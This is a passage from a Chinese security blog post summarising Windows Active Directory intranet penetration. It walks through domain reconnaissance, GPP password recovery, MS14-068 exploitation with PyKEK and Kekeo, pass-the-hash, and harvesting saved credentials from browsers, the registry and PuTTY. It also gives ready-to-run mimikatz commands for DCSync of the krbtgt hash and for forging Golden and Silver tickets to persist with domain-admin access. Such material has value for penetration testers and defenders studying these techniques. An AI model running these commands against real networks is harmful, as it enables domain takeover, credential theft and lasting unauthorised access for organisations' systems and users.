<p>Net系列命令获取域内信息<br><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Csvde/ldifde/dsquery/adfind/ldapsearch <span class="comment">#探测更详细信息</span></span><br><span class="line">使用<span class="string">`Get-SPN`</span>（powershell脚本LDAP中快速查询符合指定得用户、组、或者SPN服务名称）</span><br><span class="line">Nslookup -<span class="keyword">type</span>=SRV_ldap._tcp <span class="comment">#(寻找域控)</span></span><br><span class="line">tasklist /v  <span class="comment">#列出进程和进程所有者（看是否有域管登陆）</span></span><br><span class="line">PowerView <span class="comment">#（powershell脚本 辅助找寻定位关键用户，查看域管在线机器）</span></span><br><span class="line">WinScanX.exe  <span class="comment">#远程信息刺探</span></span><br><span class="line">Winfo.exe  <span class="comment">#遍历远程用户名</span></span><br><span class="line">nmap smb-<span class="class"><span class="keyword">enum</span>-<span class="title">sessions</span>.<span class="title">nse</span> <span class="comment">#（引擎来获取远程机器的登陆session，并且不需要管理权。）</span></span></span><br><span class="line">netview.exe<span class="string">`#(它利用`</span>NetSessionEnum<span class="string">`来寻找登陆sessions，利用`</span>NetShareEnum<span class="string">`来找寻共享，利用`</span>NetWkstaUserEnum<span class="string">`来枚举登陆的用户)</span></span><br></pre></td></tr></table></figure></p>
<hr>
<ul>
<li>linux</li>
</ul>
<ol>
<li><code>cat /etc/nsswitch</code><br>看看密码登陆策略，我可以看到使用了file ldap模式</li>
<li><code>less /etc/ldap.conf</code><br>base ou=People,dc=unix-center,dc=net<br>找到ou,dc,dc设置</li>
<li>查找10条用户记录<br><code>ldapsearch -h 192.168.2.2 -x -z 10 -p</code>指定端口</li>
<li>查看NFS连接<br><code>showmount -e ip</code></li>
<li>查找管理员信息<br>匿名方式<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -x -D <span class="string">"cn=administrator,cn=People,dc=unix-center,dc=net"</span> -b <span class="string">"cn=administrator,cn=People,dc=unix-center,dc=net"</span> -h <span class="number">192.168</span><span class="number">.2</span><span class="number">.2</span></span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>有密码形式<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -x -W -D <span class="string">"cn=administrator,cn=People,dc=unix-center,dc=net"</span> -b <span class="string">"cn=administrator,cn=People,dc=unix-center,dc=net"</span> -h <span class="number">192.168</span><span class="number">.2</span><span class="number">.2</span></span><br></pre></td></tr></table></figure></p>
<hr>
<h3 id="（二）域管权限获取"><a href="#（二）域管权限获取" class="headerlink" title="（二）域管权限获取"></a>（二）域管权限获取</h3><p>除了工作组的那几种方法外，还有专属域环境的渗透方式.</p>
<h4 id="1、组策略漏洞（GPP）"><a href="#1、组策略漏洞（GPP）" class="headerlink" title="1、组策略漏洞（GPP）"></a>1、组策略漏洞（GPP）</h4><p>域管理员使用GPP来配置和操作域，常见的操作有远程创建本地用户、映射打印机、映射磁盘等，这些操作有时候需要提供账号密码。当组策略进行分发时，会在<code>SYSVOL</code>目录下生成一个xml文件，理所当然的前面提供的账号密码都保存在这个xml文件中，而密码是经过AES加密得，也就是说完全可逆的加密算法，而微软同时也很照顾的公布了加密密钥，所以任何域普通用户就可以读取这些xml文件并使用公开的AES密钥破解密码。组策略漏洞是windows 2008的，而且不一定是groups.xml，其他的xml也可能存在密码。</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir <span class="symbol">\\</span>domain.com<span class="symbol">\s</span>ysvol<span class="symbol">\*</span></span><br></pre></td></tr></table></figure>
<h4 id="2、KERBEROS协议漏洞"><a href="#2、KERBEROS协议漏洞" class="headerlink" title="2、KERBEROS协议漏洞"></a>2、KERBEROS协议漏洞</h4><p>常见的三种共计方法：<code>MS14-068</code>，<code>Golden ticket（黄金票据）</code>，<code>SILVER TICKET（白银票据）</code></p>
<p>简单介绍下<code>Kerberos</code>协议的工作方法：</p>
<ul>
<li>客户机将明文密码进行ntlm哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥)，发送给kdc（域控）,kdc对用户进行检测，成功之后创建TGT(Ticket-Granting Ticket)</li>
<li>将TGT进行加密签名返回给客户机器，只有域用户krbtgt才能读取kerberos中tgt数据</li>
<li>然后客户机将tgt发送给域控制器KDC请求TGS（票证授权服务）票证，并且对tgt进行检测</li>
<li>检测成功之后，将目标服务账户的ntlm以及tgt进行加密，将加密后的结果返回给客户机。</li>
</ul>
<h5 id="（1）ms14-068"><a href="#（1）ms14-068" class="headerlink" title="（1）ms14-068"></a>（1）ms14-068</h5><p><code>Benjamin Delpy</code>(Mimikatz的作者)写了一个MS14-068的利用工具，叫Kekeo,是PyKEX的升级版。它能够找到并定位有漏洞的域控，在打了补丁（KB3011780）和有2012/2012R2域控得情况下仍能凑效。</p>
<p>在利用<code>MS14-068</code>之前，建议先使用<code>klist /purge</code>清除服务器端缓存的Kerberos凭据，且使用域控地址不使用IP。</p>
<ul>
<li><p>PyKEK</p>
<ul>
<li>准备条件</li>
</ul>
<figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">域用户及其口令 （攻击主机可使用其他域用户信息，比如可以在主机A上用域用户B的口令及sid攻击）</span><br><span class="line">域用户对应sid （whoami /<span class="literal">all</span>）</span><br><span class="line">域控地址</span><br><span class="line">操作系统要求<span class="literal">Win7</span>及以上，这是因为XP不支持导入Ticket</span><br></pre></td></tr></table></figure>
<ul>
<li>利用方法:</li>
</ul>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ms14<span class="number">-068.</span>exe -u -p -s -d  <span class="meta"># 生成vuln.ccache</span></span><br><span class="line">klist /purge  <span class="meta"># 清除内存中的Ticket</span></span><br><span class="line"><span class="symbol">kerberos:</span>:ptc vuln.ccache  <span class="meta"># 导入vuln.ccache</span></span><br><span class="line">klist <span class="meta"># 查看是否导入</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>Kekeo</p>
<ul>
<li>Kekeo快捷用法仅需要以下参数（使用方法）：</li>
</ul>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">域用户及其口令</span><br><span class="line">域控地址</span><br><span class="line">ms14068.exe <span class="string">/domain</span><span class="function">:vuln.local</span> <span class="string">/user</span><span class="function">:utilisateur</span> <span class="string">/password</span><span class="function">:waza1234</span>/ <span class="string">/ptt</span></span><br></pre></td></tr></table></figure>
<ul>
<li>下载地址：<a href="https://github.com/gentilkiwi/kekeo/releases" target="_blank" rel="noopener">https://github.com/gentilkiwi/kekeo/releases</a></li>
</ul>
</li>
</ul>
<p>#####（2）另外两种作为权限固守使用</p>
<p>待续….</p>
<h4 id="3、相同密码登陆（hash碰撞）"><a href="#3、相同密码登陆（hash碰撞）" class="headerlink" title="3、相同密码登陆（hash碰撞）"></a>3、相同密码登陆（hash碰撞）</h4><p>hash碰撞实际上就是利用hash传递来盲打。</p>
<p>如果内网主机的本地管理员账户密码相同且允许本地账户登陆域内其他机器。</p>
<p>在域环境中，利用<code>pass the hash</code>的渗透方式往往是这样的：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>获得一台域主机权限；</span><br><span class="line"><span class="number">2.</span>Dump内存获取用户hash（或明文）；</span><br><span class="line"><span class="number">3.</span>通过pass the hash 或 pass the ticket尝试登陆其他主机；</span><br><span class="line"><span class="number">4.</span>继续收集hash或明文，并尝试远程登陆；</span><br><span class="line"><span class="number">5.</span>知道获得域管理员hash，登陆域控，最终成功控制整个域。</span><br></pre></td></tr></table></figure>
<p>域登陆缓存mscash<br>使用reg命令提取sam、system、securit，然后用creddump7或者mimakatz提取mscash。</p>
<h4 id="4、利用漏洞配置不当获取更多主机权限"><a href="#4、利用漏洞配置不当获取更多主机权限" class="headerlink" title="4、利用漏洞配置不当获取更多主机权限"></a>4、利用漏洞配置不当获取更多主机权限</h4><ol>
<li>常见应用漏洞：<br><code>struts2、zabbix、axis、ImageMagic、fastcgi、Shellshock、redis未授权访问、Hadoop、weblogic、jboss、WebSphere、Coldfusion</code></li>
<li>常见语言反序列化漏洞<br><code>php、Java、python、ruby、node.js</code></li>
<li>数据库漏洞及配置不当<br>mssql Get-SQLServerAccess、MySQL低版本hash登陆、MySQL低版本Authentication Bypass、域内mssql凭证获取密码、monggodb未授权访问、memcache配置不当</li>
<li>内网中很多web应用存在常见漏洞、使用有漏洞的中间件和框架、弱口令及配置不当（注入、任意文件读取、备份、源码泄漏（rsync、git、svn、DS_Store）、代码执行、xss、弱口令、上传漏洞、权限绕过…）</li>
<li>web应用、及数据库中寻找其他服务器密码信息（<code>ftp、mail、smb、ldap存储、sql...</code>）</li>
<li>系统备份文件（<code>ghost</code>）中读密码</li>
<li>在已有控制权限主机中，查看各<code>浏览器书签</code>、<code>cookie</code>、<code>存储密码</code>、<code>键盘记录</code>收集相关敏感信息、查询<code>注册表</code>中保存密码、读取各客户端连接密码、putty dll注入、putty密码截取、ssh连接密码，以获取更多主机权限<br>推荐工具：<code>NetRipper</code>、<code>Puttyrider.exe</code>、<code>ProwserPasswordDump.exe</code>、<code>LaZagne.exe</code></li>
<li><code>ms08-067</code>远程溢出（极少能碰到）</li>
<li><code>cmdkey /list</code> 远程终端可信任连接连接<code>netpass.exe</code>读取该密码</li>
<li>arp欺骗中间人攻击（替换sql数据包、认证凭证获取、密码获取极大不到万不得已不会用）</li>
<li><code>WPAD中间人攻击</code>（全称网络代理自动发现协议、截获凭证该种方法不需要ARP欺骗，比较好用的一种方法（使用Responder.py/net-creds.py））</li>
<li>翻阅相关文件及以控制数据库中可能存储配置口令（别忘了回收站）</li>
<li>用已有控制权限的邮箱账号以及前期所了解到的信息进行欺骗（社会工程学）</li>
<li>定向浏览器信息ip信息定向挂马（0day）</li>
<li>用以收集的密码（组合变换密码）对各服务进行爆破</li>
<li>应用0day攻击…</li>
</ol>
<hr>
<h4 id="5、远程命令执行方式"><a href="#5、远程命令执行方式" class="headerlink" title="5、远程命令执行方式"></a>5、远程命令执行方式</h4><p>例如<code>at\schtasks\psexec\wmic\sc\ps</code>网上有很多相关资源也不占篇幅了，只提一个很少提的。从2012r2 起，他们开了一个端口叫<code>5985</code>，原理跟大家常说的powershell remote是一样的，基于winrm服务，于是可以这样执行。又是一个系统自带的远程管理工具。<br><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">winrs</span> <span class="selector-tag">-r</span><span class="selector-pseudo">:192.168.22.33</span> <span class="selector-tag">-u</span><span class="selector-pseudo">:administrator</span> <span class="selector-tag">-p</span><span class="selector-pseudo">:p</span>@<span class="keyword">assw0rd</span> ipconfig</span><br></pre></td></tr></table></figure></p>
<h4 id="6、Exchange"><a href="#6、Exchange" class="headerlink" title="6、Exchange"></a>6、Exchange</h4><p>略….</p>
<h4 id="7、滥用基于资源约束委派"><a href="#7、滥用基于资源约束委派" class="headerlink" title="7、滥用基于资源约束委派"></a>7、滥用基于资源约束委派</h4><p>略….</p>
<h4 id="8、NTLM中继"><a href="#8、NTLM中继" class="headerlink" title="8、NTLM中继"></a>8、NTLM中继</h4><p>略….</p>
<h3 id="（三）目标定位"><a href="#（三）目标定位" class="headerlink" title="（三）目标定位"></a>（三）目标定位</h3><p>在有域控权限的条件下，需要找到某台机器（服务器、个人机、数据库）</p>
<p>我们首先先将所有的域用户的详细信息都列举出来，通过详细名称（Full Name）确认其域用户。<br><a href="http://rcoil.me/2018/08/%E3%80%90%E5%9F%9F%E6%B8%97%E9%80%8F%E3%80%91-%E6%89%B9%E9%87%8FNet-User/">【域渗透】批量Net-User</a>。<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dsquery<span class="built_in"> user </span>- 查找目录中的用户。</span><br><span class="line">dsquery computer - 查找目录中的计算机。</span><br></pre></td></tr></table></figure></p>
<p>我们将上面的两条命令的执行结果结合起来进行归类。<br>然后通过域控日志查找登陆IP或者机器。当然，除了日志还有别的方式，不限于日志。<br><a href="http://rcoil.me/2018/11/%E3%80%90%E5%9F%9F%E6%B8%97%E9%80%8F%E3%80%91%E8%8E%B7%E5%8F%96%E5%9F%9F%E7%8E%AF%E5%A2%83%E5%86%85%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E4%BF%A1%E6%81%AF/">【域渗透】获取域环境内用户登录信息</a><br>找到机器或者IP之后，可通过域管理员或者用其域用户进行登陆。登陆的方式也是有多重，上面有讲过。</p>
<p>但是，也有些机器是登陆不上的。我们可以通过设置域登陆脚本进行操作。<br><a href="http://rcoil.me/2018/11/%E3%80%90%E5%9F%9F%E6%B8%97%E9%80%8F%E3%80%91%E5%9C%A8%E5%9F%9F%E6%8E%A7%E4%B8%8A%E4%BD%BF%E7%94%A8cmd%E6%9B%B4%E6%94%B9%E5%9F%9F%E7%94%A8%E6%88%B7%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84%E7%99%BB%E5%BD%95%E8%84%9A%E6%9C%AC/">【域渗透】在域控上使用cmd更改域用户配置文件中的登录脚本</a></p>
<p>后续待更新、、、</p>
<hr>
<h2 id="五、域之间、域森林"><a href="#五、域之间、域森林" class="headerlink" title="五、域之间、域森林"></a>五、域之间、域森林</h2><p>域信任关系。</p>
<h2 id="六、权限维持"><a href="#六、权限维持" class="headerlink" title="六、权限维持"></a>六、权限维持</h2><h3 id="（一）Pass-The-Ticket"><a href="#（一）Pass-The-Ticket" class="headerlink" title="（一）Pass The Ticket"></a>（一）Pass The Ticket</h3><p>获取权限后可使用<code>wmic.vbs</code>进行操作。</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript wmiexec<span class="selector-class">.vbs</span> /shell dc-<span class="number">01</span><span class="selector-class">.vuln</span><span class="selector-class">.local</span></span><br></pre></td></tr></table></figure>
<h4 id="1、Export-the-ticket"><a href="#1、Export-the-ticket" class="headerlink" title="1、Export the ticket"></a>1、Export the ticket</h4><p>在我们成功获得域控权限后，就可以导出域控内存中的<code>Ticket</code>，在默认的10个小时以内都可以利用来登录域控。</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # sekurlsa::tickets /<span class="keyword">export</span>  # 导出Ticket</span><br><span class="line">mimikatz <span class="string">"kerberos::ptt C:\test\[0;2d87a]-2-0-40e00000-a@krbtgt-Vuln.LOCAL.kirbi"</span> # 在普通域用户机器上执行</span><br></pre></td></tr></table></figure>
<p>Tips：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">64</span>位系统使用ptt功能要用<span class="number">32</span>位的mimikatz，如果用<span class="number">64</span>的mimikatz，那么无法导入Ticket</span><br><span class="line">这种方式导入的Ticket默认在<span class="number">10</span>小时以内生效</span><br></pre></td></tr></table></figure>
<h4 id="2、Golden-Ticket（黄金票据）"><a href="#2、Golden-Ticket（黄金票据）" class="headerlink" title="2、Golden Ticket（黄金票据）"></a>2、Golden Ticket（黄金票据）</h4><p><code>Golden Ticket</code>是伪造的<code>TGT(Ticket Granting Ticket)</code>–&gt;票据授权票据，所以可以获取任何Kerberos服务权限。</p>
<p>每个用户的<code>Ticket</code>都是由<code>krbtgt</code>用户的密码Hash来生成的，如果我们拿到了<code>Krbtgt</code>的密码Hash，就可以随意伪造<code>Ticket</code>。</p>
<h5 id="（1）导出krbtgt的Hash"><a href="#（1）导出krbtgt的Hash" class="headerlink" title="（1）导出krbtgt的Hash"></a>（1）导出krbtgt的Hash</h5><p>在域控上执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!bash</span></span><br><span class="line">mimikatz <span class="built_in">log</span> <span class="string">"lsadump::dcsync /domain:vuln.local /user:krbtgt"</span></span><br></pre></td></tr></table></figure>
<p>生成<code>mimikatz.log</code>记录输出，使用log输出是为了方便复制Hash值</p>
<p>提取所需信息：</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/domain：test.local</span><br><span class="line">/sid:S<span class="string">-1</span><span class="string">-5</span><span class="string">-21</span><span class="string">-4155807533</span>-xxxxxx<span class="string">-2767329826</span> </span><br><span class="line">/aes256:af71a24ea463446f9b4c645e1bfexxxxxx70c7d785df10acf008xxxxxx5e682f</span><br></pre></td></tr></table></figure>
<h5 id="（2）生成Golden-Ticket"><a href="#（2）生成Golden-Ticket" class="headerlink" title="（2）生成Golden Ticket"></a>（2）生成Golden Ticket</h5><p>伪造的用户设置为test，执行以下命令生成文件<code>gold.kirbi</code></p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mimikatz "kerberos::golden /domain:vuln.local /sid:S<span class="string">-1</span><span class="string">-5</span><span class="string">-21</span><span class="string">-4155807533</span>-xxxxxx<span class="string">-2767329826</span> </span><br><span class="line">/aes256:af71a24ea463446f9b4c645e1bfexxxxxx70c7d785df10acf008xxxxxx5e682f /user:test </span><br><span class="line">/ticket:test.kirbi"</span><br></pre></td></tr></table></figure>
<p>Tips：生成<code>Golden Ticket</code>不仅可以使用<code>aes256</code>，也可用<code>krbtgt</code>的<code>NTLM hash</code></p>
<h5 id="（3）导入Golden-Ticket"><a href="#（3）导入Golden-Ticket" class="headerlink" title="（3）导入Golden Ticket"></a>（3）导入Golden Ticket</h5><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">kerberos</span><span class="selector-pseudo">::ptt</span> <span class="selector-tag">test</span><span class="selector-class">.kirbi</span></span><br></pre></td></tr></table></figure>
<p>Tips:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">这种方式导入的Ticket默认在20分钟以内生效，当然，如果过期了，再次ptt导入Golden Ticket就好</span><br><span class="line">可以伪造任意用户，即使其不存在</span><br><span class="line">krbtgt的NTLM <span class="built_in">hash</span>不会轻易改变，即使修改域控管理员密码</span><br></pre></td></tr></table></figure>
<h4 id="3、Silver-Ticket（白银票据）"><a href="#3、Silver-Ticket（白银票据）" class="headerlink" title="3、Silver Ticket（白银票据）"></a>3、Silver Ticket（白银票据）</h4><p><code>Silver Ticket</code>是伪造的<code>TGS(Ticket Granting Server)</code>–&gt;票据授权服务器，所以也叫<code>service ticket</code>，只能访问指定的服务权限。</p>
<ul>
<li>比如现在要访问域控上的<code>cifs</code>服务（cifs服务用于Windows主机间的文件共享）</li>
</ul>
<h5 id="（1）所需条件"><a href="#（1）所需条件" class="headerlink" title="（1）所需条件"></a>（1）所需条件</h5><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">/domain</span></span><br><span class="line"><span class="string">/sid</span></span><br><span class="line"><span class="string">/target</span>:目标服务器的域名全称，此处为域控的全称</span><br><span class="line"><span class="string">/service</span>：目标服务器上面的kerberos服务，此处为cifs</span><br><span class="line"><span class="string">/rc4</span>：计算机账户的NTLM hash，域控主机的本地计算机账户</span><br><span class="line"><span class="string">/user</span>：要伪造的用户名，此处可用silver测试</span><br></pre></td></tr></table></figure>
<h5 id="（2）使用方法"><a href="#（2）使用方法" class="headerlink" title="（2）使用方法"></a>（2）使用方法</h5><figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz "kerberos::golden /domain:vuln.local /sid:S<span class="string">-1</span><span class="string">-5</span><span class="string">-21</span><span class="string">-4155807533</span><span class="string">-921486164</span><span class="string">-2767329826</span> /target:dc<span class="string">-01</span>.vuln.local /service:cifs /rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt"</span><br></pre></td></tr></table></figure>
<p>成功导入，就可以访问域控上的文件共享。</p>
<ul>
<li><p>如果要访问域控上的<code>LDAP</code>服务</p>
<p>只需要把/service的名称改为LDAP，/user改为krbtgt，/rc4改为krbtgt的NTLM HASH</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz "kerberos::golden /domain:vuln.local /sid:S<span class="string">-1</span><span class="string">-5</span><span class="string">-21</span><span class="string">-4155807533</span>-xxxxxx<span class="string">-2767329826</span>  /target:dc<span class="string">-01</span>.vuln.local /service:LDAP /rc4:d5304f9ea69523479xxxxxxebb5a2155 /user:krbtgt /ptt"</span><br></pre></td></tr></table></figure>
<p>导入成功，但是无法访问域控的文件共享服务，因为范围有限，只能访问指定的服务权限。</p>
<p>但是，执行以下命令可以远程访问<code>LDAP服务</code>来获得<code>krbtgt</code>的信息:</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">mimikatz</span> <span class="string">"lsadump::dcsync /dc:dc-01.vuln.local /domain:vuln.local /user:krbtgt"</span></span><br></pre></td></tr></table></figure>
<p>所以可以获取任何Kerberos服务权限。</p>
<p>注：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">lsadump::dcsync</span><br><span class="line">向 DC 发起一个同步对象（可获取帐户的密码信息）的质询。</span><br><span class="line">需要的权限包括管理员组（Administrators），域管理员组（ Domain Admins）或企业管理员组（Enterprise Admins）以及域控制器的计算机帐户</span><br><span class="line">只读域控制器默认不允许读取用户密码数据</span><br></pre></td></tr></table></figure>
<p>参数选项：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">/user </span>- 要查询的用户id 或 SID</span><br><span class="line">/domain（可选的）默认设置为当前域。</span><br><span class="line">/dc（可选的）指定DCSync 连接的域控位置</span><br></pre></td></tr></table></figure>
<p>当然还有其他可作<code>Silver Ticket</code>的服务</p>
</li>
</ul>
<h3 id="（二）三好学生师傅的文章"><a href="#（二）三好学生师傅的文章" class="headerlink" title="（二）三好学生师傅的文章"></a>（二）三好学生师傅的文章</h3><p><a href="https://wooyun.x10sec.org/static/drops/tips-12518.html" target="_blank" rel="noopener">域渗透——Security Support Provider</a></p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-12670.html" target="_blank" rel="noopener">域渗透——Skeleton Key</a></p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-13079.html" target="_blank" rel="noopener">域渗透——Hook PasswordChangeNotify</a></p>
<p>….</p>
<h3 id="（三）域内配置ACL后门及检测清理"><a href="#（三）域内配置ACL后门及检测清理" class="headerlink" title="（三）域内配置ACL后门及检测清理"></a>（三）域内配置ACL后门及检测清理</h3><h3 id="（四）windows后门种植方式收集"><a href="#（四）windows后门种植方式收集" class="headerlink" title="（四）windows后门种植方式收集"></a>（四）windows后门种植方式收集</h3><hr>
<h1 id="0x05-整合参考"><a href="#0x05-整合参考" class="headerlink" title="0x05 整合参考"></a>0x05 整合参考</h1><p>更多资料请参考以下文章</p>
<p><a href="https://mp.weixin.qq.com/s?__biz=MzIxNTQxMjQyNg==&amp;mid=2247484247&amp;idx=1&amp;sn=ca9f7fd6ca95000b2b41b13a0a356ede&amp;chksm=9799f8f2a0ee71e44ca01c49c4f9d5a7e222e822608de9e27941272f445600e40e6c7406e94f&amp;mpshare=1&amp;scene=23&amp;srcid=06167UJn60EzUeiDU2pmwqk8#rd" target="_blank" rel="noopener">黑客游走于企业windows内网的几种姿势</a></p>
<p><a href="http://bobao.360.cn/learning/detail/3204.html" target="_blank" rel="noopener">内网渗透——网络环境的判断</a></p>
<p><a href="https://www.freebuf.com/vuls/56081.html" target="_blank" rel="noopener">深入解读MS14-068漏洞：微软精心策划的后门？</a></p>
<p><a href="http://xnianq.cn/2018/10/16/%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" target="_blank" rel="noopener">域渗透之横向移动</a></p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-11631.html" target="_blank" rel="noopener">域渗透——Pass The Hash &amp; Pass The Key</a></p>
<p><a href="http://xnianq.cn/2018/07/23/windows%E5%90%8E%E9%97%A8%E7%A7%8D%E6%A4%8D%E6%96%B9%E5%BC%8F%E6%94%B6%E9%9B%86/" target="_blank" rel="noopener">windows后门种植方式收集</a></p>
<p><a href="https://wooyun.x10sec.org/static/drops/tips-12159.html" target="_blank" rel="noopener">域渗透——Pass The Ticket</a></p>
<p><a href="https://adsecurity.org/?p=2011" target="_blank" rel="noopener">How Attackers Use Kerberos Silver Tickets to Exploit Systems</a></p>
<p><a href="https://www.freebuf.com/articles/system/189942.html" target="_blank" rel="noopener">域内配置ACL后门及检测清理</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.jpg" alt="RcoIl WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>嘤嘤怪：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://rcoil.me/2017/06/内网渗透/" title="内网渗透归纳（持续更新）">https://rcoil.me/2017/06/内网渗透/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web安全/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> Web安全</a>
          
            <a href="/tags/内网/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 内网</a>
          
            <a href="/tags/系统安全/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 系统安全</a>
          
            <a href="/tags/后门/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 后门</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/06/CTF线下赛总结/" rel="next" title="CTF线下攻防赛总结">
                <i class="fa fa-chevron-left"></i> CTF线下攻防赛总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/安全鸡/" rel="prev" title="安全鸡">
                安全鸡 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="RcoIl">
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
